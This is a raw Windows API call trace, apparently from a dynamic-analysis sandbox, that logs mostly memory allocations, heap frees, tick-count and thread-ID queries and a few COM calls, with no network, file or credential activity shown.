[0083.206] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.206] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152ae8
[0083.207] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.207] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.207] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.207] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x17a3f0
[0083.207] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x800) returned 0x17be90
[0083.207] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x800) returned 0x17c698
[0083.207] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.207] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.208] ??2@YAPAXI@Z () returned 0x29b16b8
[0083.208] ??2@YAPAXI@Z () returned 0x29b1788
[0083.208] ??2@YAPAXI@Z () returned 0x29b1850
[0083.240] ??2@YAPAXI@Z () returned 0x29b18b8
[0083.240] ??2@YAPAXI@Z () returned 0x29b1920
[0083.241] ??2@YAPAXI@Z () returned 0x29b1b98
[0083.241] ??2@YAPAXI@Z () returned 0x29b1c00
[0083.241] malloc (_Size=0x40) returned 0x29b1c70
[0083.241] malloc (_Size=0x104) returned 0x29b1cb8
[0083.256] ??2@YAPAXI@Z () returned 0x29b1dc8
[0083.256] ??2@YAPAXI@Z () returned 0x29b1de8
[0083.257] GetTickCount () returned 0x1445697
[0083.257] GetCurrentThreadId () returned 0xe84
[0083.257] ??2@YAPAXI@Z () returned 0x29b1e08
[0083.258] ??2@YAPAXI@Z () returned 0x29b1e28
[0083.258] ??2@YAPAXI@Z () returned 0x29b1e48
[0083.258] ??2@YAPAXI@Z () returned 0x29b1e68
[0083.259] ??2@YAPAXI@Z () returned 0x29b1e88
[0083.259] ??2@YAPAXI@Z () returned 0x29b1ea8
[0083.259] ??2@YAPAXI@Z () returned 0x29b1ec8
[0083.260] ??2@YAPAXI@Z () returned 0x29b1ee8
[0083.260] ??2@YAPAXI@Z () returned 0x29b1f08
[0083.260] ??2@YAPAXI@Z () returned 0x29b1f28
[0083.261] ??2@YAPAXI@Z () returned 0x29b1f48
[0083.261] ??2@YAPAXI@Z () returned 0x29b1f68
[0083.262] ??2@YAPAXI@Z () returned 0x29b1f88
[0083.262] ??2@YAPAXI@Z () returned 0x29b1fc0
[0083.262] ??2@YAPAXI@Z () returned 0x29b1fe0
[0083.262] ??2@YAPAXI@Z () returned 0x29b27a8
[0083.263] GetTickCount () returned 0x1445697
[0083.263] GetCurrentThreadId () returned 0xe84
[0083.263] ??2@YAPAXI@Z () returned 0x29b2000
[0083.263] ??2@YAPAXI@Z () returned 0x29b2020
[0083.263] ??2@YAPAXI@Z () returned 0x29b2040
[0083.264] ??2@YAPAXI@Z () returned 0x29b2060
[0083.264] ??2@YAPAXI@Z () returned 0x29b2080
[0083.264] ??2@YAPAXI@Z () returned 0x29b20a0
[0083.265] ??2@YAPAXI@Z () returned 0x29b20c0
[0083.265] ??2@YAPAXI@Z () returned 0x29b20e0
[0083.265] ??2@YAPAXI@Z () returned 0x29b2100
[0083.266] ??2@YAPAXI@Z () returned 0x29b2120
[0083.266] ??2@YAPAXI@Z () returned 0x29b2140
[0083.266] ??2@YAPAXI@Z () returned 0x29b2160
[0083.267] ??2@YAPAXI@Z () returned 0x29b2180
[0083.267] ??2@YAPAXI@Z () returned 0x29b21a0
[0083.267] ??2@YAPAXI@Z () returned 0x29b21c0
[0083.268] GetTickCount () returned 0x14456a7
[0083.268] GetCurrentThreadId () returned 0xe84
[0083.268] ??2@YAPAXI@Z () returned 0x29b21e0
[0083.268] ??2@YAPAXI@Z () returned 0x29b2200
[0083.268] ??2@YAPAXI@Z () returned 0x29b2220
[0083.269] ??2@YAPAXI@Z () returned 0x29b2240
[0083.269] ??2@YAPAXI@Z () returned 0x29b2260
[0083.270] ??2@YAPAXI@Z () returned 0x29b2280
[0083.271] ??2@YAPAXI@Z () returned 0x29b22a0
[0083.271] ??2@YAPAXI@Z () returned 0x29b22c0
[0083.271] ??2@YAPAXI@Z () returned 0x29b22e0
[0083.272] ??2@YAPAXI@Z () returned 0x29b2300
[0083.272] ??2@YAPAXI@Z () returned 0x29b2320
[0083.272] ??2@YAPAXI@Z () returned 0x29b2340
[0083.273] ??2@YAPAXI@Z () returned 0x29b2360
[0083.273] ??2@YAPAXI@Z () returned 0x29b2380
[0083.273] ??2@YAPAXI@Z () returned 0x29b23a0
[0083.273] GetTickCount () returned 0x14456a7
[0083.273] GetCurrentThreadId () returned 0xe84
[0083.274] ??2@YAPAXI@Z () returned 0x29b2df8
[0083.274] ??2@YAPAXI@Z () returned 0x29b23c0
[0083.274] ??2@YAPAXI@Z () returned 0x29b23e0
[0083.274] ??2@YAPAXI@Z () returned 0x29b2400
[0083.275] ??2@YAPAXI@Z () returned 0x29b2420
[0083.275] ??2@YAPAXI@Z () returned 0x29b2440
[0083.275] ??2@YAPAXI@Z () returned 0x29b2460
[0083.276] ??2@YAPAXI@Z () returned 0x29b2480
[0083.276] ??2@YAPAXI@Z () returned 0x29b24a0
[0083.276] ??2@YAPAXI@Z () returned 0x29b24c0
[0083.276] ??2@YAPAXI@Z () returned 0x29b24e0
[0083.276] ??2@YAPAXI@Z () returned 0x29b2500
[0083.276] ??2@YAPAXI@Z () returned 0x29b2520
[0083.277] ??2@YAPAXI@Z () returned 0x29b2540
[0083.277] ??2@YAPAXI@Z () returned 0x29b2560
[0083.277] ??2@YAPAXI@Z () returned 0x29b2580
[0083.277] ??2@YAPAXI@Z () returned 0x29b25a0
[0083.277] ??2@YAPAXI@Z () returned 0x29b25c0
[0083.277] ??2@YAPAXI@Z () returned 0x29b25e0
[0083.277] ??2@YAPAXI@Z () returned 0x29b2600
[0083.278] ??2@YAPAXI@Z () returned 0x29b2620
[0083.278] ??2@YAPAXI@Z () returned 0x29b2640
[0083.278] ??2@YAPAXI@Z () returned 0x29b2660
[0083.278] ??2@YAPAXI@Z () returned 0x29b2680
[0083.278] ??2@YAPAXI@Z () returned 0x29b26a0
[0083.278] ??2@YAPAXI@Z () returned 0x29b26c0
[0083.278] ??2@YAPAXI@Z () returned 0x29b26e0
[0083.278] ??2@YAPAXI@Z () returned 0x29b2700
[0083.279] ??2@YAPAXI@Z () returned 0x29b2720
[0083.279] ??2@YAPAXI@Z () returned 0x29b2740
[0083.279] ??2@YAPAXI@Z () returned 0x29b2760
[0083.279] ??2@YAPAXI@Z () returned 0x29b3448
[0083.279] ??2@YAPAXI@Z () returned 0x29b2780
[0083.279] ??2@YAPAXI@Z () returned 0x29b3ab0
[0083.279] ??2@YAPAXI@Z () returned 0x29b3ad0
[0083.280] ??2@YAPAXI@Z () returned 0x29b3af0
[0083.280] ??2@YAPAXI@Z () returned 0x29b3b10
[0083.280] ??2@YAPAXI@Z () returned 0x29b3b30
[0083.280] ??2@YAPAXI@Z () returned 0x29b3b50
[0083.280] ??2@YAPAXI@Z () returned 0x29b3b70
[0083.280] ??2@YAPAXI@Z () returned 0x29b3b90
[0083.280] ??2@YAPAXI@Z () returned 0x29b3bb0
[0083.280] ??2@YAPAXI@Z () returned 0x29b3bd0
[0083.280] ??2@YAPAXI@Z () returned 0x29b3bf0
[0083.281] ??2@YAPAXI@Z () returned 0x29b3c10
[0083.281] ??2@YAPAXI@Z () returned 0x29b3c30
[0083.281] ??2@YAPAXI@Z () returned 0x29b3c50
[0083.281] ??2@YAPAXI@Z () returned 0x29b3c70
[0083.282] ??2@YAPAXI@Z () returned 0x29b3c90
[0083.282] ??2@YAPAXI@Z () returned 0x29b3cb0
[0083.282] ??2@YAPAXI@Z () returned 0x29b3cd0
[0083.282] ??2@YAPAXI@Z () returned 0x29b3cf0
[0083.282] ??2@YAPAXI@Z () returned 0x29b3d10
[0083.282] ??2@YAPAXI@Z () returned 0x29b3d30
[0083.282] ??2@YAPAXI@Z () returned 0x29b3d50
[0083.282] ??2@YAPAXI@Z () returned 0x29b3d70
[0083.283] ??2@YAPAXI@Z () returned 0x29b3d90
[0083.283] ??2@YAPAXI@Z () returned 0x29b3db0
[0083.283] ??2@YAPAXI@Z () returned 0x29b3dd0
[0083.283] ??2@YAPAXI@Z () returned 0x29b3df0
[0083.283] ??2@YAPAXI@Z () returned 0x29b3e10
[0083.284] ??2@YAPAXI@Z () returned 0x29b3e30
[0083.284] ??2@YAPAXI@Z () returned 0x29b4298
[0083.284] ??2@YAPAXI@Z () returned 0x29b3e50
[0083.284] ??2@YAPAXI@Z () returned 0x29b3e70
[0083.284] ??2@YAPAXI@Z () returned 0x29b3e90
[0083.284] ??2@YAPAXI@Z () returned 0x29b3eb0
[0083.284] ??2@YAPAXI@Z () returned 0x29b3ed0
[0083.284] ??2@YAPAXI@Z () returned 0x29b3ef0
[0083.285] ??2@YAPAXI@Z () returned 0x29b3f10
[0083.285] ??2@YAPAXI@Z () returned 0x29b3f30
[0083.285] ??2@YAPAXI@Z () returned 0x29b3f50
[0083.285] ??2@YAPAXI@Z () returned 0x29b3f70
[0083.285] ??2@YAPAXI@Z () returned 0x29b3f90
[0083.285] ??2@YAPAXI@Z () returned 0x29b3fb0
[0083.286] ??2@YAPAXI@Z () returned 0x29b3fd0
[0083.286] ??2@YAPAXI@Z () returned 0x29b3ff0
[0083.286] ??2@YAPAXI@Z () returned 0x29b4010
[0083.286] ??2@YAPAXI@Z () returned 0x29b4030
[0083.286] ??2@YAPAXI@Z () returned 0x29b4050
[0083.286] ??2@YAPAXI@Z () returned 0x29b4070
[0083.286] ??2@YAPAXI@Z () returned 0x29b4090
[0083.287] ??2@YAPAXI@Z () returned 0x29b40b0
[0083.287] ??2@YAPAXI@Z () returned 0x29b40d0
[0083.287] ??2@YAPAXI@Z () returned 0x29b40f0
[0083.287] ??2@YAPAXI@Z () returned 0x29b4110
[0083.287] ??2@YAPAXI@Z () returned 0x29b4130
[0083.287] ??2@YAPAXI@Z () returned 0x29b4150
[0083.287] ??2@YAPAXI@Z () returned 0x29b4170
[0083.288] ??2@YAPAXI@Z () returned 0x29b4190
[0083.288] ??2@YAPAXI@Z () returned 0x29b41b0
[0083.288] ??2@YAPAXI@Z () returned 0x29b41d0
[0083.288] ??2@YAPAXI@Z () returned 0x29b41f0
[0083.288] ??2@YAPAXI@Z () returned 0x29b48e8
[0083.288] ??2@YAPAXI@Z () returned 0x29b4210
[0083.288] ??2@YAPAXI@Z () returned 0x29b4230
[0083.288] ??2@YAPAXI@Z () returned 0x29b4250
[0083.289] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39ec68 | out: ppv=0x39ec68*=0x1369d0) returned 0x0
[0083.293] ??3@YAXPAX@Z () returned 0x1
[0083.294] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152ae8 | out: hHeap=0x110000) returned 1
[0083.294] MulDiv (nNumber=202, nNumerator=100, nDenominator=512) returned 39
[0083.294] IUnknown:Release (This=0x1369d0) returned 0x1
[0083.294] GetTickCount () returned 0x14456b6
[0083.294] ??2@YAPAXI@Z () returned 0x29b4270
[0083.294] ??2@YAPAXI@Z () returned 0x29b4f50
[0083.294] ??2@YAPAXI@Z () returned 0x29b4f70
[0083.295] GetTickCount () returned 0x14456b6
[0083.295] GetCurrentThreadId () returned 0xe84
[0083.295] ??2@YAPAXI@Z () returned 0x29b4f90
[0083.295] ??2@YAPAXI@Z () returned 0x29b4fb0
[0083.295] ??2@YAPAXI@Z () returned 0x29b4fd0
[0083.311] ??2@YAPAXI@Z () returned 0x29b4ff0
[0083.311] ??2@YAPAXI@Z () returned 0x29b5010
[0083.312] ??2@YAPAXI@Z () returned 0x29b5030
[0083.313] ??2@YAPAXI@Z () returned 0x29b5050
[0083.313] ??2@YAPAXI@Z () returned 0x29b5070
[0083.313] ??2@YAPAXI@Z () returned 0x29b5090
[0083.314] ??2@YAPAXI@Z () returned 0x29b50b0
[0083.314] ??2@YAPAXI@Z () returned 0x29b50d0
[0083.314] ??2@YAPAXI@Z () returned 0x29b50f0
[0083.315] ??2@YAPAXI@Z () returned 0x29b5110
[0083.315] ??2@YAPAXI@Z () returned 0x29b5130
[0083.315] ??2@YAPAXI@Z () returned 0x29b5150
[0083.315] GetTickCount () returned 0x14456d5
[0083.315] GetCurrentThreadId () returned 0xe84
[0083.316] ??2@YAPAXI@Z () returned 0x29b5170
[0083.316] ??2@YAPAXI@Z () returned 0x29b5190
[0083.316] ??2@YAPAXI@Z () returned 0x29b51b0
[0083.317] ??2@YAPAXI@Z () returned 0x29b51d0
[0083.317] ??2@YAPAXI@Z () returned 0x29b51f0
[0083.317] ??2@YAPAXI@Z () returned 0x29b5210
[0083.318] GetTickCount () returned 0x14456d5
[0083.318] GetCurrentThreadId () returned 0xe84
[0083.318] ??2@YAPAXI@Z () returned 0x29b5230
[0083.318] ??2@YAPAXI@Z () returned 0x29b5250
[0083.318] ??2@YAPAXI@Z () returned 0x29b5270
[0083.319] ??2@YAPAXI@Z () returned 0x29b5290
[0083.319] ??2@YAPAXI@Z () returned 0x29b52b0
[0083.319] ??2@YAPAXI@Z () returned 0x29b52d0
[0083.320] ??2@YAPAXI@Z () returned 0x29b52f0
[0083.320] ??2@YAPAXI@Z () returned 0x29b5310
[0083.320] ??2@YAPAXI@Z () returned 0x29b5330
[0083.321] ??2@YAPAXI@Z () returned 0x29b5350
[0083.321] ??2@YAPAXI@Z () returned 0x29b5370
[0083.321] ??2@YAPAXI@Z () returned 0x29b5390
[0083.322] ??2@YAPAXI@Z () returned 0x29b53b0
[0083.322] ??2@YAPAXI@Z () returned 0x29b53d0
[0083.322] ??2@YAPAXI@Z () returned 0x29b53f0
[0083.323] GetTickCount () returned 0x14456d5
[0083.323] GetCurrentThreadId () returned 0xe84
[0083.323] ??2@YAPAXI@Z () returned 0x29b5410
[0083.323] ??2@YAPAXI@Z () returned 0x29b5430
[0083.323] ??2@YAPAXI@Z () returned 0x29b5450
[0083.324] ??2@YAPAXI@Z () returned 0x29b5470
[0083.324] ??2@YAPAXI@Z () returned 0x29b5490
[0083.324] ??2@YAPAXI@Z () returned 0x29b54b0
[0083.325] ??2@YAPAXI@Z () returned 0x29b54d0
[0083.325] ??2@YAPAXI@Z () returned 0x29b54f0
[0083.325] ??2@YAPAXI@Z () returned 0x29b5510
[0083.326] ??2@YAPAXI@Z () returned 0x29b5530
[0083.326] ??2@YAPAXI@Z () returned 0x29b5550
[0083.326] ??2@YAPAXI@Z () returned 0x29b5570
[0083.327] ??2@YAPAXI@Z () returned 0x29b5590
[0083.328] ??2@YAPAXI@Z () returned 0x29b55b0
[0083.328] ??2@YAPAXI@Z () returned 0x29b55d0
[0083.328] ??2@YAPAXI@Z () returned 0x29b55f0
[0083.328] ??2@YAPAXI@Z () returned 0x29b5610
[0083.328] ??2@YAPAXI@Z () returned 0x29b5630
[0083.329] ??2@YAPAXI@Z () returned 0x29b5650
[0083.329] ??2@YAPAXI@Z () returned 0x29b5670
[0083.329] ??2@YAPAXI@Z () returned 0x29b5690
[0083.329] ??2@YAPAXI@Z () returned 0x29b56b0
[0083.329] ??2@YAPAXI@Z () returned 0x29b56d0
[0083.329] ??2@YAPAXI@Z () returned 0x29b56f0
[0083.329] ??2@YAPAXI@Z () returned 0x29b5710
[0083.329] ??2@YAPAXI@Z () returned 0x29b5750
[0083.330] ??2@YAPAXI@Z () returned 0x29b5770
[0083.330] ??2@YAPAXI@Z () returned 0x29b5790
[0083.330] ??2@YAPAXI@Z () returned 0x29b57b0
[0083.330] ??2@YAPAXI@Z () returned 0x29b57d0
[0083.330] ??2@YAPAXI@Z () returned 0x29b57f0
[0083.330] ??2@YAPAXI@Z () returned 0x29b5810
[0083.330] ??2@YAPAXI@Z () returned 0x29b5830
[0083.331] ??2@YAPAXI@Z () returned 0x29b5850
[0083.331] ??2@YAPAXI@Z () returned 0x29b5870
[0083.331] ??2@YAPAXI@Z () returned 0x29b5890
[0083.331] ??2@YAPAXI@Z () returned 0x29b58b0
[0083.331] ??2@YAPAXI@Z () returned 0x29b58d0
[0083.331] ??2@YAPAXI@Z () returned 0x29b58f0
[0083.331] ??2@YAPAXI@Z () returned 0x29b5910
[0083.331] ??2@YAPAXI@Z () returned 0x29b5930
[0083.332] ??2@YAPAXI@Z () returned 0x29b5950
[0083.332] ??2@YAPAXI@Z () returned 0x29b5970
[0083.332] ??2@YAPAXI@Z () returned 0x29b5990
[0083.332] ??2@YAPAXI@Z () returned 0x29b59b0
[0083.332] ??2@YAPAXI@Z () returned 0x29b59d0
[0083.332] ??2@YAPAXI@Z () returned 0x29b59f0
[0083.332] ??2@YAPAXI@Z () returned 0x29b5a10
[0083.333] ??2@YAPAXI@Z () returned 0x29b5f38
[0083.333] ??2@YAPAXI@Z () returned 0x29b5a30
[0083.333] ??2@YAPAXI@Z () returned 0x29b5a50
[0083.333] ??2@YAPAXI@Z () returned 0x29b5a70
[0083.333] ??2@YAPAXI@Z () returned 0x29b5a90
[0083.333] ??2@YAPAXI@Z () returned 0x29b5ab0
[0083.333] ??2@YAPAXI@Z () returned 0x29b5ad0
[0083.333] ??2@YAPAXI@Z () returned 0x29b5af0
[0083.334] ??2@YAPAXI@Z () returned 0x29b5b10
[0083.334] ??2@YAPAXI@Z () returned 0x29b5b30
[0083.334] ??2@YAPAXI@Z () returned 0x29b5b50
[0083.334] ??2@YAPAXI@Z () returned 0x29b5b70
[0083.334] ??2@YAPAXI@Z () returned 0x29b5b90
[0083.335] ??2@YAPAXI@Z () returned 0x29b5bb0
[0083.335] ??2@YAPAXI@Z () returned 0x29b5bd0
[0083.335] ??2@YAPAXI@Z () returned 0x29b5bf0
[0083.335] ??2@YAPAXI@Z () returned 0x29b5c10
[0083.335] ??2@YAPAXI@Z () returned 0x29b5c30
[0083.335] ??2@YAPAXI@Z () returned 0x29b5c50
[0083.335] ??2@YAPAXI@Z () returned 0x29b5c70
[0083.336] ??2@YAPAXI@Z () returned 0x29b5c90
[0083.336] ??2@YAPAXI@Z () returned 0x29b5cb0
[0083.336] ??2@YAPAXI@Z () returned 0x29b5cd0
[0083.336] ??2@YAPAXI@Z () returned 0x29b5cf0
[0083.336] ??2@YAPAXI@Z () returned 0x29b5d10
[0083.336] ??2@YAPAXI@Z () returned 0x29b5d30
[0083.336] ??2@YAPAXI@Z () returned 0x29b5d50
[0083.336] ??2@YAPAXI@Z () returned 0x29b5d70
[0083.336] ??2@YAPAXI@Z () returned 0x29b5d90
[0083.336] ??2@YAPAXI@Z () returned 0x29b5db0
[0083.336] ??2@YAPAXI@Z () returned 0x29b5dd0
[0083.336] ??2@YAPAXI@Z () returned 0x29b9fe8
[0083.337] ??2@YAPAXI@Z () returned 0x29b5df0
[0083.337] ??2@YAPAXI@Z () returned 0x29b5e10
[0083.337] ??2@YAPAXI@Z () returned 0x29b5e30
[0083.337] ??2@YAPAXI@Z () returned 0x29b5e50
[0083.337] ??2@YAPAXI@Z () returned 0x29b5e70
[0083.337] ??2@YAPAXI@Z () returned 0x29b5e90
[0083.337] ??2@YAPAXI@Z () returned 0x29b5eb0
[0083.337] ??2@YAPAXI@Z () returned 0x29b5ed0
[0083.337] ??2@YAPAXI@Z () returned 0x29b5ef0
[0083.337] ??2@YAPAXI@Z () returned 0x29b5f10
[0083.337] ??2@YAPAXI@Z () returned 0x29ba650
[0083.337] ??2@YAPAXI@Z () returned 0x29ba670
[0083.337] ??2@YAPAXI@Z () returned 0x29ba690
[0083.337] ??2@YAPAXI@Z () returned 0x29ba6b0
[0083.337] ??2@YAPAXI@Z () returned 0x29ba6d0
[0083.338] ??2@YAPAXI@Z () returned 0x29ba6f0
[0083.338] ??2@YAPAXI@Z () returned 0x29ba710
[0083.338] ??2@YAPAXI@Z () returned 0x29ba730
[0083.338] ??2@YAPAXI@Z () returned 0x29ba750
[0083.338] ??2@YAPAXI@Z () returned 0x29ba770
[0083.338] ??2@YAPAXI@Z () returned 0x29ba790
[0083.338] ??2@YAPAXI@Z () returned 0x29ba7b0
[0083.338] ??2@YAPAXI@Z () returned 0x29ba7d0
[0083.338] ??2@YAPAXI@Z () returned 0x29ba7f0
[0083.338] ??2@YAPAXI@Z () returned 0x29ba810
[0083.338] ??2@YAPAXI@Z () returned 0x29ba830
[0083.338] ??2@YAPAXI@Z () returned 0x29ba850
[0083.338] ??2@YAPAXI@Z () returned 0x29ba870
[0083.338] ??2@YAPAXI@Z () returned 0x29ba890
[0083.338] ??2@YAPAXI@Z () returned 0x29ba8b0
[0083.338] ??2@YAPAXI@Z () returned 0x29bae38
[0083.339] ??2@YAPAXI@Z () returned 0x29ba8d0
[0083.339] ??2@YAPAXI@Z () returned 0x29ba8f0
[0083.339] ??2@YAPAXI@Z () returned 0x29ba910
[0083.339] ??2@YAPAXI@Z () returned 0x29ba930
[0083.339] ??2@YAPAXI@Z () returned 0x29ba950
[0083.339] ??2@YAPAXI@Z () returned 0x29ba970
[0083.339] ??2@YAPAXI@Z () returned 0x29ba990
[0083.339] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39ec68 | out: ppv=0x39ec68*=0x1369d0) returned 0x0
[0083.358] MulDiv (nNumber=204, nNumerator=100, nDenominator=822) returned 25
[0083.358] IUnknown:Release (This=0x1369d0) returned 0x1
[0083.358] GetTickCount () returned 0x14456f5
[0083.358] ??2@YAPAXI@Z () returned 0x29ba9b0
[0083.358] ??2@YAPAXI@Z () returned 0x29ba9d0
[0083.359] ??2@YAPAXI@Z () returned 0x29ba9f0
[0083.359] ??2@YAPAXI@Z () returned 0x29baa10
[0083.359] ??2@YAPAXI@Z () returned 0x29baa30
[0083.360] ??2@YAPAXI@Z () returned 0x29baa50
[0083.360] ??2@YAPAXI@Z () returned 0x29baa70
[0083.360] ??2@YAPAXI@Z () returned 0x29baa90
[0083.361] ??2@YAPAXI@Z () returned 0x29baab0
[0083.361] ??2@YAPAXI@Z () returned 0x29baad0
[0083.361] ??2@YAPAXI@Z () returned 0x29baaf0
[0083.362] GetTickCount () returned 0x1445704
[0083.362] GetCurrentThreadId () returned 0xe84
[0083.362] ??2@YAPAXI@Z () returned 0x29bab10
[0083.362] ??2@YAPAXI@Z () returned 0x29bab30
[0083.362] ??2@YAPAXI@Z () returned 0x29bab50
[0083.363] ??2@YAPAXI@Z () returned 0x29bab70
[0083.363] ??2@YAPAXI@Z () returned 0x29bab90
[0083.363] ??2@YAPAXI@Z () returned 0x29babb0
[0083.364] ??2@YAPAXI@Z () returned 0x29babd0
[0083.364] ??2@YAPAXI@Z () returned 0x29babf0
[0083.364] ??2@YAPAXI@Z () returned 0x29bac10
[0083.365] ??2@YAPAXI@Z () returned 0x29bac30
[0083.365] ??2@YAPAXI@Z () returned 0x29bac50
[0083.365] ??2@YAPAXI@Z () returned 0x29bac70
[0083.366] ??2@YAPAXI@Z () returned 0x29bac90
[0083.366] ??2@YAPAXI@Z () returned 0x29bacb0
[0083.366] ??2@YAPAXI@Z () returned 0x29bacd0
[0083.367] GetTickCount () returned 0x1445704
[0083.367] GetCurrentThreadId () returned 0xe84
[0083.367] ??2@YAPAXI@Z () returned 0x29bacf0
[0083.367] ??2@YAPAXI@Z () returned 0x29bad10
[0083.368] ??2@YAPAXI@Z () returned 0x29bad30
[0083.368] ??2@YAPAXI@Z () returned 0x29bad50
[0083.368] ??2@YAPAXI@Z () returned 0x29bad70
[0083.368] ??2@YAPAXI@Z () returned 0x29bad90
[0083.369] ??2@YAPAXI@Z () returned 0x29badb0
[0083.369] ??2@YAPAXI@Z () returned 0x29badd0
[0083.370] ??2@YAPAXI@Z () returned 0x29badf0
[0083.370] ??2@YAPAXI@Z () returned 0x29bae10
[0083.370] ??2@YAPAXI@Z () returned 0x29bb4a0
[0083.371] ??2@YAPAXI@Z () returned 0x29bb4c0
[0083.371] ??2@YAPAXI@Z () returned 0x29bb4e0
[0083.371] ??2@YAPAXI@Z () returned 0x29bb500
[0083.371] ??2@YAPAXI@Z () returned 0x29bb520
[0083.372] GetTickCount () returned 0x1445704
[0083.372] GetCurrentThreadId () returned 0xe84
[0083.372] ??2@YAPAXI@Z () returned 0x29bb540
[0083.373] ??2@YAPAXI@Z () returned 0x29bb560
[0083.373] ??2@YAPAXI@Z () returned 0x29bb580
[0083.373] ??2@YAPAXI@Z () returned 0x29bb5a0
[0083.374] ??2@YAPAXI@Z () returned 0x29bb5c0
[0083.374] ??2@YAPAXI@Z () returned 0x29bb5e0
[0083.375] ??2@YAPAXI@Z () returned 0x29bb600
[0083.375] ??2@YAPAXI@Z () returned 0x29bb620
[0083.375] ??2@YAPAXI@Z () returned 0x29bb640
[0083.376] ??2@YAPAXI@Z () returned 0x29bb660
[0083.376] ??2@YAPAXI@Z () returned 0x29bb680
[0083.376] ??2@YAPAXI@Z () returned 0x29bb6a0
[0083.377] ??2@YAPAXI@Z () returned 0x29bb6c0
[0083.377] ??2@YAPAXI@Z () returned 0x29bb6e0
[0083.377] ??2@YAPAXI@Z () returned 0x29bb700
[0083.377] ??2@YAPAXI@Z () returned 0x29bb720
[0083.377] ??2@YAPAXI@Z () returned 0x29bb740
[0083.378] ??2@YAPAXI@Z () returned 0x29bb760
[0083.378] ??2@YAPAXI@Z () returned 0x29bb780
[0083.378] ??2@YAPAXI@Z () returned 0x29bb7a0
[0083.378] ??2@YAPAXI@Z () returned 0x29bb7c0
[0083.378] ??2@YAPAXI@Z () returned 0x29bb7e0
[0083.378] ??2@YAPAXI@Z () returned 0x29bb800
[0083.378] ??2@YAPAXI@Z () returned 0x29bb820
[0083.379] ??2@YAPAXI@Z () returned 0x29bb840
[0083.379] ??2@YAPAXI@Z () returned 0x29bb860
[0083.379] ??2@YAPAXI@Z () returned 0x29bb880
[0083.379] ??2@YAPAXI@Z () returned 0x29bb8a0
[0083.379] ??2@YAPAXI@Z () returned 0x29bb8c0
[0083.379] ??2@YAPAXI@Z () returned 0x29bb8e0
[0083.379] ??2@YAPAXI@Z () returned 0x29bb900
[0083.380] ??2@YAPAXI@Z () returned 0x29bb920
[0083.380] ??2@YAPAXI@Z () returned 0x29bb940
[0083.380] ??2@YAPAXI@Z () returned 0x29bb960
[0083.380] ??2@YAPAXI@Z () returned 0x29bb980
[0083.380] ??2@YAPAXI@Z () returned 0x29bb9a0
[0083.380] ??2@YAPAXI@Z () returned 0x29bb9c0
[0083.380] ??2@YAPAXI@Z () returned 0x29bb9e0
[0083.380] ??2@YAPAXI@Z () returned 0x29bba00
[0083.381] ??2@YAPAXI@Z () returned 0x29bba20
[0083.381] ??2@YAPAXI@Z () returned 0x29bba40
[0083.381] ??2@YAPAXI@Z () returned 0x29bba60
[0083.381] ??2@YAPAXI@Z () returned 0x29bba80
[0083.381] ??2@YAPAXI@Z () returned 0x29bbaa0
[0083.381] ??2@YAPAXI@Z () returned 0x29bbc88
[0083.382] ??2@YAPAXI@Z () returned 0x29bbac0
[0083.382] ??2@YAPAXI@Z () returned 0x29bbae0
[0083.382] ??2@YAPAXI@Z () returned 0x29bbb00
[0083.382] ??2@YAPAXI@Z () returned 0x29bbb20
[0083.382] ??2@YAPAXI@Z () returned 0x29bbb40
[0083.382] ??2@YAPAXI@Z () returned 0x29bbb60
[0083.382] ??2@YAPAXI@Z () returned 0x29bbb80
[0083.383] ??2@YAPAXI@Z () returned 0x29bbba0
[0083.383] ??2@YAPAXI@Z () returned 0x29bbbc0
[0083.383] ??2@YAPAXI@Z () returned 0x29bbbe0
[0083.383] ??2@YAPAXI@Z () returned 0x29bbc00
[0083.383] ??2@YAPAXI@Z () returned 0x29bbc20
[0083.383] ??2@YAPAXI@Z () returned 0x29bbc40
[0083.384] ??2@YAPAXI@Z () returned 0x29bbc60
[0083.384] ??2@YAPAXI@Z () returned 0x29bc2f0
[0083.384] ??2@YAPAXI@Z () returned 0x29bc310
[0083.384] ??2@YAPAXI@Z () returned 0x29bc330
[0083.384] ??2@YAPAXI@Z () returned 0x29bc350
[0083.384] ??2@YAPAXI@Z () returned 0x29bc370
[0083.385] ??2@YAPAXI@Z () returned 0x29bc390
[0083.385] ??2@YAPAXI@Z () returned 0x29bc3b0
[0083.385] ??2@YAPAXI@Z () returned 0x29bc3d0
[0083.385] ??2@YAPAXI@Z () returned 0x29bc3f0
[0083.385] ??2@YAPAXI@Z () returned 0x29bc410
[0083.385] ??2@YAPAXI@Z () returned 0x29bc430
[0083.385] ??2@YAPAXI@Z () returned 0x29bc450
[0083.385] ??2@YAPAXI@Z () returned 0x29bc470
[0083.385] ??2@YAPAXI@Z () returned 0x29bc490
[0083.385] ??2@YAPAXI@Z () returned 0x29bc4b0
[0083.385] ??2@YAPAXI@Z () returned 0x29bc4d0
[0083.385] ??2@YAPAXI@Z () returned 0x29bcad8
[0083.386] ??2@YAPAXI@Z () returned 0x29bc4f0
[0083.386] ??2@YAPAXI@Z () returned 0x29bc510
[0083.386] ??2@YAPAXI@Z () returned 0x29bc530
[0083.386] ??2@YAPAXI@Z () returned 0x29bc550
[0083.386] ??2@YAPAXI@Z () returned 0x29bc570
[0083.386] ??2@YAPAXI@Z () returned 0x29bc590
